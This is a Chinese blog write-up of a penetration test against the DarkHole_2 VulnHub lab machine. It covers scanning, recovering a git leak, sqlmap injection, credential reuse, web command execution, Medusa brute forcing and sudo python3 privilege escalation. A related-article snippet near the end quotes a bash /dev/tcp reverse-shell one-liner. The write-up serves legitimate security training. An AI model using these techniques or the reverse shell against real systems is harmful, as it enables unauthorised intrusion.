用kali入侵 DarkHole_2测试

最新推荐文章于 2026-06-21 16:48:49 发布
原创 最新推荐文章于 2026-06-21 16:48:49 发布 · 438 阅读 · 3 ·
本内容遵循CC 4.0 BY-SA版权协议
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
标签
#网络安全 #网络

开发板推荐:天空星STM32F407VET6开发板

超高性价比 STM32主控 | 超高主频 | 一板兼容百芯 | 比赛神器 | 沉金彩色丝印

点击查看

进入kali系统调出root交互式界面

netdiscover -r 000.000.000.000/24 -------局域网探测IP工具

nmap 设备端口扫描

image-20241019162815038

image-20241019163133585

image-20241019163109375

发现两个攻击点一个是80端口的Http 一个是22端口的ssh

image-20241019163556163

image-20241019163852355

image-20241019164725117

image-20241019164932528

image-20241026002333656

发现有许多GIT文件 可能会出现git源码泄露

image-20241026003036920

image-20241026003230780

使用githack URL 命令还原git源文件

打开面板控制命令行

image-20241026005220870

输入 sudo git log 查看不同版本日志

image-20241026005348842

使用 sudo git diff 查看版本里面的信息

image-20241026010107073

可以明显看出登录密码 进行网站登录

image-20241026011940735

使用sqlmap进行sql注入测试 使用网站地址以及cookie进行注入 并且加参数 --dbs 显示爆出库名

image-20241026011833873

-D 后加库名 -dump 显示库里面的内容

image-20241026012202882

image-20241019172723592

爆出内容后查看发现ssh的登录名以及密码 进行尝试

image-20241026012457873

image-20241019174000249

发现三个用户可登录

image-20241026211758811

然后进行提权 使用计划任务提权

计划任务的文件夹在 /etc/cron*

image-20241026203617014

image-20241026204513687

image-20241026204723199

我们用curl命令打开改网站 在地址后面输入?cmd=id 即可将cmd替换为id字符并且在losy用户中执行。我们即可发现将cmd=系统命令及可执行在losy用户下的命令

image-20241026204756229

将cmd=history我们试着查看历史命令 发现没有记录

image-20241026205412105

我们在用户文件下查看.bash_history里面的历史记录    %20是空格

image-20241026211114543

发现一个密码记录

image-20241026211321413

我们用密码进行尝试登录

image-20241026211624805

成功登陆上 losy用户

image-20241026213123124

image-20241026213606583

  • -F:设置在成功验证后停止该主机的爆破尝试。

使用美杜莎进行密码爆破并成功爆出密码

image-20241026213238196

进行尝试登录

image-20241026213404732

成功登录lama用户

image-20241026213926348

image-20241026214836496

发现losy用户可执行py3的命令

image-20241026215030707

image-20241026215603449

image-20241026215533936

使用sudo python3

image-20241026220006490

我们使用bash建立一个交互式命令行

image-20241026220311669

image-20241026220446816

开发板推荐:天空星STM32F407VET6开发板

超高性价比 STM32主控 | 超高主频 | 一板兼容百芯 | 比赛神器 | 沉金彩色丝印

点击查看
柒玖zzz
关注
渗透测试实战——hackme:1靶机
LRcaho的博客
04-24 4214
靶机地址:hackme: 1 ~ VulnHubhttps://www.vulnhub.com/entry/hackme-1,330/ 靶机IP:192.168.28.137 测试机系统:kali、win10 测试机IP:192.168.28.128 目录 一、信息收集 1.主机发现 2.端口扫描 3.服务扫描 4.目录扫描 5.访问目录扫描出的网站 二、漏洞探测 1.查看是否存在sql注入 2.sql注入 3.登录superadmin 三、getshell 1.上传一句话木
ssh渗透与hydra爆破(简明不啰嗦)
yi152787的博客
01-13 3383
一次对22端口靶机的实验,当中使用MSF与hydra两种方式爆破解密。
kali渗透专栏 (七)
qq_45672899的博客
05-16 1156
NMAP 一. 1、nmap +ip 默认情况下,Nmap 会扫描 1000 个最有可能开放的 TCP 端口。 nmap -v +ip -v 表示显示冗余信息,在扫描过程中显示扫描的细节,从而让用户了解当前的扫描状态。 扫描一个范围: 端口 1-65535/-p-(全扫描) # nmap -p 1-65535 +ip 生产环境下,我们只需要开启正在提供服务的端口,其他端口都关闭。 关闭不需要开的服务有两种方法: 情景 1:你认识这个服务,直接关服务 # systemctl stop +serv
常见的端口漏洞入侵主机
热门推荐
D的博客
06-05 2万+
端口漏洞利用 当我们渗透一个网站时发现从网站渗透不进去的时候,就可以查看该网站主机开启了哪些端口,来从其开启的端口来进行入侵 一旦端口开放的话就可以从外部访问,操作系统都有或多或少的漏洞,特殊的请求或者指令触发之后就可以提升权限 实验环境 同一网段的两台主机: 入侵主机:kali 受害主机ip:192.168.31.69 使用kali和它本身自带的一些工具对受害主机进行入侵 先利用nmap对受害主...
如何在kali系统打开22端口
weixin_43635067的博客
12-11 9493
今天准备使用FileZilla从虚拟机里面的kali系统下载文件,然后发现连接不了,我猜测是22端口没有打开,然后我去打开了端口,果然就可以连接了,接下来就来讲讲如何在kali系统中打开22端口。关闭自启动的命令为update-rc.d ssh disable。
SSH端口爆破及其应急响应方案
m0_58540923的博客
07-26 2662
Secure Shell (安全外壳协议,简称SSH) 是一种加密的网络传输协议;用途:安全远程登录;可帮助我们在windows下去连接并操作linux服务器。常见的SSH客户端有putty、SSH Secure Shell、MobaXterm 、Xshell等;常用端口22爆破时间、爆破用户、攻击者ip、攻击方式。
基于Docker构建安全沙箱环境:darkhole2项目实战与架构解析
congli3478的博客
06-15 650
容器化技术通过命名空间和控制组等机制,实现了进程、网络和文件系统的隔离,为应用提供了轻量级的运行环境。其核心原理在于共享宿主机内核,但通过资源限制和安全配置构建独立执行空间。这一技术价值在于平衡了安全性与性能,使得快速创建、销毁隔离环境成为可能,极大地提升了开发与测试效率。在安全研究、软件测试和CI/CD等应用场景中,容器化沙箱能够安全地运行未知代码或分析可疑文件,有效防止对主力环境的污染。本文介绍的darkhole2项目,正是基于Docker容器技术,通过集成网络隔离、资源限制、行为监控和快照回滚等特性,
从手机病毒清理到渗透测试入门:构建主动安全防御思维
最新发布
weixin_30617797的博客
06-21 81
在数字安全领域,恶意软件(Malware)是常见的威胁形式,其通过漏洞利用和社交工程等手段入侵设备。理解其工作原理是有效防御的基础。渗透测试作为一种主动安全评估方法,通过模拟攻击者思维,帮助安全从业者识别系统弱点,提升整体安全水位。在工程实践中,通过搭建隔离的虚拟环境(如Kali Linux与Metasploitable 2靶机),安全爱好者可以合法学习信息收集、漏洞扫描等核心技能。例如,使用nmap进行端口扫描与服务识别,能够发现目标系统开放的服务及版本,进而关联已知漏洞库,这种从攻击视角审视防御的思维,
从脚本小子到合格渗透测试工程师:系统化成长路径与核心能力构建
culh2177的博客
06-18 328
渗透测试作为网络安全领域的核心实践技术,其本质是通过模拟恶意攻击来评估系统安全性的方法论。从技术原理层面看,渗透测试建立在扎实的计算机网络、操作系统和编程基础之上,涉及信息收集、漏洞分析、权限提升等系统性流程。掌握渗透测试不仅需要理解各类安全漏洞的成因与利用机制,更需要构建从工具使用到方法论实践的综合能力体系。在工程实践中,渗透测试的价值在于帮助企业发现安全弱点、验证防御措施有效性,广泛应用于金融、政务、互联网等关键行业的安全评估场景。本文围绕渗透测试工程师的成长路径,深入解析如何通过靶场实战、工具深度使用
Kali linux渗透测试系列————22Kali linux 漏洞映射之深化攻击工具
Fly_鹏程万里
05-16 1733
深化攻击工具本节将介绍在漏洞诊断综合框架中占有重要地位且功能强大的Metasploit应用程序,以及应用次程序的工具Fast-Track.Metasploit:漏洞诊断框架Metasploit框架本身涵盖了诸多应用程序的漏洞代码,因此能够很好的响应应用于最新漏洞诊断。其功能和用途机器广泛。Msf(Metasploit Framework)开源工具是提供攻击代码、有效负载、编码器、侦查工具、安全测试...
应用协议安全:Hydra 端口爆破工具.(九头蛇)
Karka_的博客
03-23 1510
登录、数据库、SSH、FTP 等服务.应用协议安全:Hydra 端口爆破工具.(九头蛇)Hydra(九头蛇)使用:使用方法:直接打开 kali 终端,输入.(1)实战:爆破 SSH 协议.( 22 端口 )(2)实战:爆破 远程桌面 RDP.( 3389 端口 )(3)实战:爆破 共享文件 SMB ( 445 端口 )(4)实战:爆破 邮箱协议 POP3( 110 端口 )(5)实战:爆破 文件传输 FTP ( 21 端口 )(6)实战:爆破 MSSQL数据库( 1433 端口
Ubuntu安装教程(非常详细)从零基础入门到精通,看完这一篇就够了_
m0_59598029的博客
08-20 5621
很多小伙伴在Ubuntu的安装上总会有疑问,今天就来给小可爱们来一套完整的Ubuntu快速安装教程。
推荐一些网络安全的网站和论坛_网络安全论坛
程序员阿飘 的博客
12-11 4000
网络安全产业就像一个江湖,各色人等聚集。相对于欧美国家基础扎实(懂加密、会防护、能挖洞、擅工程)的众多名门正派,我国的人才更多的属于旁门左道(很多白帽子可能会不服气),因此在未来的人才培养和建设上,需要调整结构,鼓励更多的人去做“正向”的、结合“业务”与“数据”、“自动化”的“体系、建设”,才能解人才之渴,真正的为社会全面互联网化提供安全保障。
Dark_hole2靶机实战——详细版
qq_74243714的博客
07-02 1259
Sorry, user jehad may not run sudo on darkhole.(不可 sudo提权)--------------计划任务提权-------------sudo -l (发现不能够使用sudo,因为没有losy密码)发现修改历史中有账号和密码,以及dashboard.php页面。方法二:josy用户退回到根目录查看所有文件(包括隐藏文件)SSH登录losy用户(sudo提权)发现账号管理页面,可以修改账号信息。方法一:想到爆破密码(一般不建议)获取到SSH用户密码!
VulnHub-DarkHole_2靶机实战(超详细保姆级教程)
精品博客,你值得一看~
08-13 9198
记得我们查看过9999端口运行的程序,当我们看到源代码的内容时,我们看到这允许远程命令执行。bash -c ‘bash -i >& /dev/tcp/192.168.184.156/9001 0>&1’ #记得修改你的IP。id=1' and 1=2 --+ #页面信息消失,说明id的闭合为单引号。到此,我们就可以进行ssh连接了.下面是拓展工具注入的方式.着急看结果的宝宝们可以直接移步下面的ssh连接步骤.
[渗透测试学习靶机05] vulnhub靶场 DarkHole: 2
weixin_47112073的博客
10-19 1886
vulnhub靶场 DarkHole: 2,难度:困难级别
kali渗透Metasploitable2靶机--ssh22、telnet23端口漏洞利用
2301_77457568的博客
05-25 1701
Nmapmsfconsole介绍及简单使用Nmap(网络映射器)是一个免费开放的网络扫描和嗅探工具。该工具的基本功能:1.探测主机是否在线2.扫描主机端口,嗅探所提供的网络服务3.推断主机所使用的操作系统常用命令描述nmap -sL列表扫描,简单列出要扫描的目标nmap -sV探测开放端口服务指纹(即对用服务的版本信息)nmap -p扫描指定的端口nmap -O收集目标使用的操作系统信息nmap - A启用OS检测,版本检测nmap -v。
Vulnhub-DARKHOLE: 2
Re1_zf的博客
02-06 432
1、git源码泄露可以用git相关命令,比如git log和git show,都可以快速定位敏感信息2、sqlmap进行测试时,有时网站需要指定cookie3、ssh -L可以进行端口转发,语法类参考ssh -L 9999:127.0.0.1:9999 jehad@192.168.64.1374、脚本反弹shell5、.bash_history很有可能隐藏着敏感信息6、简单的sudo提权。
DarkHole_2靶机渗透攻略
weixin_47311099的博客
01-12 1067
信息收集 主机发现 nmap -sC -sV 192.168.93.0/24 -p- 目标:192.168.93.134 开放22ssh,80http 网站信息收集 并未发现太多信息 但是根据nmap的扫描结果可知,目录192.168.93.134:80/.git/ 存在git泄露。 ​ git泄露漏洞利用 下载git源码 ​python2 GitHack.py http://192.168.93.134/.git ​ ​ 密码逻辑流程 在logon.php中可以发现用户、密码的处理逻辑 ​
网络安全漏洞深度剖析
kali_Ma的博客
10-16 5328
一、漏洞背景 2021年7月13日,美国微软威胁情报中心发布安全公告[1],文中指出黑客利用Serv-U 0day对极少数美国军工部门成功进行了攻击,同日Serv-U母公司solarwinds也发布安全公告[2],并针对最新大版本发布了补丁[3]。 (注意:目前发布的补丁只针对最新的15.2.3大版本,且只能是付费用户才能下载安装补丁,非付费用户目前无法从官方渠道获取有效补丁。) 根据补丁比较和fuzzer,宁静之盾安全团队成功复现了该远程溢出漏洞,并能在实战环境下成功利用。 截至9月10日,互联网上未发现
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值